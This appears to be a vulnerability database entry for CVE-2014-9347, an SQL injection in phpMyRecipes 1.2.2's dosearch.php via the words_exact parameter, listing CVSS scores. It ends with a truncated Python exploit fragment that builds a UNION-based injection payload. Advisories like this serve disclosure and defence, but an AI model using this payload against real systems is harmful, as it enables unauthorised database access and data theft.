7.5
CVSSv2

CVE-2014-9347

Published: 08/12/2014 Updated: 08/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in dosearch.php in phpMyRecipes 1.2.2 allows remote malicious users to execute arbitrary SQL commands via the words_exact parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpmyrecipes project phpmyrecipes 1.2.2

Exploits

#!/usr/bin/python import httplib from bs4 import BeautifulSoup import re import os ########### # Function that takes an SQL select statement and inject it into the words_exact variable of dosearchphp # Returns BeautifulSoup object ########### def sqli(select): inject = '"\' IN BOOLEAN MODE) UNION ' + select + '#' body = 'words_all=&wor ...